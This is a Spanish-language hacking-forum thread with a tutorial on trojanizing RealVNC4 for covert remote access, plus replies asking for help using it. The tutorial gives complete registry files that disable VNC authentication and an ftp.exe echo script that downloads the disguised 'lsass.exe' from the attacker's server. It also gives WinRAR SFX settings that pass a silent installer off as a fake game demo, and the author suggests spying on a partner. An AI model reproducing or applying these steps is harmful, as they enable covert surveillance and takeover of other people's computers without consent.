elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: ¿Usas Skype? Protégete de los Skype Resolver


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Avanzado
| | |-+  Hacking Básico (Moderadores: zhyzura, toxeek)
| | | |-+  Troyanizando Real VNC4
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 4 5 Ir Abajo Respuesta Imprimir
Autor Tema: Troyanizando Real VNC4  (Leído 20,064 veces)
WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.816


The Hacktivism is not a crime


Ver Perfil WWW
Troyanizando Real VNC4
« en: 7 Abril 2007, 23:02 »

                    TROYANIZANDO REAL VNC 4

Materiales:
Servidor FTP (cualquiera)
WinVNC4
ResHacker


Acá aprenderemos a troyanizar el realvnc4 de diferentes maneras, pero lo primero será ocultar el fastidioso icono negro con blanco que se muestra al lado de la hora y que nos delata cuando el realvnc está activo… lo haremos con el ResHacker borrando los recursos de iconos e imágenes y todo aquellos que nos pueda delatar:



Si no quieres complicarte la vida puedes bajarlo desde http://512.iespana.es/vnc ya compilado y todo, y por último lo renombramos a “lsass.exe” aprovechándonos de una vulnerabilidad del administrador de tareas que dice que lsass.exe no puede detenerse XD.

Ahora suponiendo que estamos dentro de una shell… lo vamos a subir por ftp.
Abrimos nuestro servidor FTP y configuramos el nombre de usuario y contraseña:




Debe aparecer un icono así:

Ahora vamos a configurar nuestro troyano de dos formas… una es para ver solamente el escritorio de la victima sin que se de cuenta y otra para tomar el control total sin que pueda hacer nada jajaja que malo :p . Para esto necesitamos hacer una entrada de registro de la siguiente manera:

 Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\RealVnc\WinVNC4]
"SecurityTypes"="None"
"ReverseSecurityTypes"="None"
"DisconnectAction"="None"
"QueryConnect"=dword:00000000
"QueryOnlyIfLoggedOn"=dword:00000000
"LocalHost"=dword:00000000
"Hosts"=dword:00000000
"AcceptKeyEvents"=dword:00000000
"AcceptPointerEvents"=dword:00000000
"AcceptCutText"=dword:00000000
"SendCutText"=dword:00000000
"DisableLocalInputs"=dword:00000000
"DisconnectClients"=dword:00000000
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"RemoveWallpaper"=dword:00000000
"DisableEffects"=dword:00000000
"UpdateMethod"=dword:00000001
"PollConsoleWindows"=dword:00000001
"UseCaptureBlt"=dword:00000001
"UseHooks"=dword:00000001
"Protocol3.3"=dword:00000000


Copias todo esto y lo pegas en el block de notas y lo guardas como “vm.tmp” que significa “View Mode” … si quieres manejar el escritorio de la victima entonces pega este otro texto:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\RealVnc\WinVNC4]
"SecurityTypes"="None"
"ReverseSecurityTypes"="None"
"DisconnectAction"="None"
"QueryConnect"=dword:00000000
"QueryOnlyIfLoggedOn"=dword:00000000
"LocalHost"=dword:00000000
"Hosts"="0,"
"AcceptKeyEvents"=dword:00000001
"AcceptPointerEvents"=dword:00000001
"AcceptCutText"=dword:00000001
"SendCutText"=dword:00000001
"DisableLocalInputs"=dword:00000001
"DisconnectClients"=dword:00000000
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"RemoveWallpaper"=dword:00000001
"DisableEffects"=dword:00000000
"UpdateMethod"=dword:00000001
"PollConsoleWindows"=dword:00000001
"UseCaptureBlt"=dword:00000001
"UseHooks"=dword:00000001
"Protocol3.3"=dword:00000000
"PortNumber"=dword:0000170c
"IdleTimeout"=dword:00000e10
"HTTPPortNumber"=dword:000016a8
"RemovePattern"=dword:00000000


Y lo guardas como “ct.tmp” que significa “Control Total” .

Ahora subiremos las configuraciones y el vnc desde nuestra shell usando el comando ftp.exe de la siguiente forma:



La idea es que atraves del comando echo hagamos un texto con los comandos que ejecutará ftp.exe de la siguiente manera:

Echo o >> ftp.txt
Echo 192.168.1.69 >> ftp.txt     En este caso 192.168.1.69 es nuestra IP como servidor FTP
Echo user >> ftp.txt   Este es el usuario del FTP
Echo pass >> ftp.txt   Este es el password del FTP
Echo get lsass.exe >> ftp.txt   Este es nuestro VNC4
Echo get wm_hooks.dll >> ftp.txt
Echo get logmessages.dll >> ftp.txt
Echo get vm.tmp >> ftp.txt
  Si solamente miramos usamos “vm” si controlamos usamos “ct”
Echo quit >> ftp.txt

Ahora ejecutamos el comando para que nos suba todo: ftp –s:ftp.txt y ahora que ya tenemos todo importamos el registro que hicimos de la siguiente manera: reg import vm.tmp o reg import ct.tmp en el caso de que queramos controlar o solo mirar.

Ahora que ya tenemos nuestro troyano listo y configurado, vamos a proceder a ejecutarlo de la siguiente manera:

Lsass.exe –register
Lsass.exe –start




Ahora que nuestro troyano está corriendo como servicio, estamos listos para entrar con nuestro cliente:



Donde dice 127.0.0.1 es la IP de la victima que tiene el troyano.
Si te fijas… ya no aparece ningun icono que delate su existencia y Aunque pinches con el boton primario o secundario del Mouse (boton derecho e isquierdo) no aparece nada:



Ahora lo haremos de otra forma… lo daremos como carnada sin estar dentro de una shell usando Winrar.

Materiales:
Winrar
RealVNC4


Ahora seleccionaremos lo siguiente y lo comprimiremos:



Y procedemos a compilar nuestro troyano:

1: Crearemos un archivo “sfx”…


2: Vamos a la pestaña “Avanzado y pinchamos en “Opciones SFX”


3: En carpeta de extracción ponemos “%homedrive%%homepath%\update” y en “ejecutar tras la extracción” ponemos “setup” (después explicaremos porque)


4: En la ficha “Modo” seleccionamos “Ocultar todo” y “Omitir ficheros existentes” para evitar errores futuros y que ademas no muestre nada, ya que queremos que sea lo mas silencioso posible no?.


5: En “Texto e icono” donde dice abajo: “Cargar icono SFX desde fichero” buscamos un icono a elección… en mi caso le puse el de un juego llamado “Max Peine” y presionamos aceptar una sola vez.


6: En “comentario aparecerá un texto que dice en un lado: Setup=setup y reemplazamos eso por lo siguiente:

Setup="%windir%\system32\cmd.exe" /c reg import "%homedrive%%homepath%\update\vm.tmp"
Setup=lasaa.exe -noconsole -register
Setup=lasaa.exe -noconsole -start


Fijarse que es una sola linea por cada setup. Ahora me diran que es esto?... ps explico:

Setup="%windir%\system32\cmd.exe" /c reg import  %homedrive%%homepath%\update\vm.tmp"  // Importamos la configuracion de nuestro troyano
Setup=lasaa.exe -noconsole –register // Registramos el troyano para que se ejecute en modo SYSTEM
Setup=lasaa.exe -noconsole –start // Iniciamos el troyano

Ahora damos aceptar a todo y debe aparecer algo asi:


En mi caso le puse el icono de Max Peine para decirle a mi querido y buen amigo llamado “Victima” que es el demo de MAX PEINE III (obviamente inexistente) y al abrirlo sucederá lo mismo que el primer ejemplo:



Sin icono alguno y nos conectamos con nuestro cliente:



Obviamente 127.0.0.1 debe ir la IP de la victima.

Ahora puedes saber si tu novia te pone los cuernos o darle el susto de su vida al que siempre te ha jodido controlando su pc XD.
Nota: Puedes añadir entradas de registros extras para hacer que se ejecute cada ves que inicie la pc o hacer lo que se te la gana.

Las aplicaciones y el video está en http://512.iespana.es/vnc

Att. Yan
Unilola Software.



« Última modificación: 7 Abril 2007, 23:51 por WHK » En línea

WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.816


The Hacktivism is not a crime


Ver Perfil WWW
Re: Troyanizando Real VNC4
« Respuesta #1 en: 7 Abril 2007, 23:03 »

Ops... no se porque las imagenes no aparecen... si le dan en propiedades pueden ver el link del gif y pegarlo en el explorador... trataré de ponerlos en otro lugar mientras tanto.
-----------------------------------------------------------------------
Solucionado.
« Última modificación: 7 Abril 2007, 23:46 por WHK » En línea

nAdA001

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Troyanizando Real VNC4
« Respuesta #2 en: 10 Abril 2007, 20:24 »

Olle amigo, yo monto iroffers y me interesa ese troyano pero quisiera ver si nos podemos contactar y ver si me puedes ayudar a crear uno pero como lo necesito.

gracias y muy buen manual.
En línea

WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.816


The Hacktivism is not a crime


Ver Perfil WWW
Re: Troyanizando Real VNC4
« Respuesta #3 en: 11 Abril 2007, 02:34 »

Ps claro que no hay ningun problema con poder ayudarte, pero recuerda que esto del RealVNC4 es muy basico (por eso lo puse en la sección de Hacking Basico) y hay otras opciones muy buenas, pero si necesitas algo puedes postear tu pregunta o duda y con gusto te la responderé publicamente para que asi los demas tambien puedan aprender ;)
PD: si a algun moderador piensa que es muy rebasico puede sacarlo y lo haré en privado  :xD No hay problem.
En línea

zhyzura
Moderador
***
Desconectado Desconectado

Mensajes: 2.489



Ver Perfil
Re: Troyanizando Real VNC4
« Respuesta #4 en: 11 Abril 2007, 06:45 »

aqui no existe lo rebasico xDD

por lo que veo has tenido algo de tiempo libre, espero pronto tenga en mis manos una laptop para seguir con los mios xD

ale, otro texto para el recopilatorio de post :P
En línea

WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.816


The Hacktivism is not a crime


Ver Perfil WWW
Re: Troyanizando Real VNC4
« Respuesta #5 en: 11 Abril 2007, 07:01 »

Ps cuando no tengo conexión tengo todo el tiempo del mundo  :xD
Yo no tengo ningun problema con ayudar a la gente... imagina que a veces me llaman por el msn para solucionarles problemas con netcat o con su router o con asistencias remorass como el vnc4 en este caso y hay dias que estoy horas y horas explicando lo mimo pero fijate que nunca me aburro... es mas... me gusta que la gente aprenda cuando no sabe ya que nadie nació sabiendo, claro que hay gente que abusa y pregunta lo que facilmente encuentras en un buscador, pero si alguien tiene alguna duda con algun post mio o con lo que sea que esté a mi alcance ps diganlo en el foro o en privado... me da =
En línea

zhyzura
Moderador
***
Desconectado Desconectado

Mensajes: 2.489



Ver Perfil
Re: Troyanizando Real VNC4
« Respuesta #6 en: 11 Abril 2007, 07:08 »

entonces quizas tu si llegues a superar el sindrome del moderador xD (luego te lo cuento), de hecho ahora que lo mencionas un dia de estos me pongo las pilas y busco varios buenos post que quedaron perdidos.

ale ale que ya nos estamos desviando del tema xD
En línea

Man-In-the-Middle
Colaborador
***
Desconectado Desconectado

Mensajes: 3.810



Ver Perfil
Re: Troyanizando Real VNC4
« Respuesta #7 en: 12 Abril 2007, 19:51 »

jajaj ! zhyzura , te acuerdas de nuestros primeros pininos con el vnc , uuuuuuuy que años,
En línea

http://ik9c.com
Código:
Internet Krypto Currency IK9C
fitu

Desconectado Desconectado

Mensajes: 206


Ver Perfil WWW
Re: Troyanizando Real VNC4
« Respuesta #8 en: 13 Abril 2007, 04:28 »

Hola, antes q todo muy buen "manual" pero tengo un problema, cree el archivo todo bien siguiendo cada paso, utilizando la segunda forma q se explica...
se lo pase a un amigo y el lo ejecuto, y dijo q no le paso nada raro (a lo q me refiero es ningun error ni nada de eso) despues abri el Cliente, puse la IP pero me pide Password... como puede ser eso? y si le pongo cualquier cosa me dice q hubo muchas fallas o algo asi y me dice q reintente, despues de esto abri el servidor en mi maquina y me meti al Cliente, puse 127.0.0.1 pero tb me pide Password...
q puedo hacer?
gracias :D
saludos
En línea

WHK
吴阿卡
Moderador Global
***
Desconectado Desconectado

Mensajes: 5.816


The Hacktivism is not a crime


Ver Perfil WWW
Re: Troyanizando Real VNC4
« Respuesta #9 en: 13 Abril 2007, 05:56 »

Si te pide password significa que no hiciste bien la entrada de registro  :-\ ya que esa entrada permite que te conectes con el servidor sin la necesidad de una contraseña entre otras cosas:
"SecurityTypes"="None"
"ReverseSecurityTypes"="None"

En todo casi si no quedó claro... ps está el video en http://512.iespana.es/vnc pero en todo caso igual no está demas ayudar con las dudas que puedan tener.
recuerda que Debes importar el registro... haz una prueva y hazlo manualmente en tu pc de la siguiente manera:
-----------------------------------------------------------------
Citar:
Ahora ejecutamos el comando para que nos suba todo: ftp –s:ftp.txt y ahora que ya tenemos todo importamos el registro que hicimos de la siguiente manera: reg import vm.tmp o reg import ct.tmp en el caso de que queramos controlar o solo mirar.
------------------------------------------------------------------

despues abres el regedit y miras si el registro fue introducido ;)
En línea

Páginas: [1] 2 3 4 5 Ir Arriba Respuesta Imprimir 

Ir a:  
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines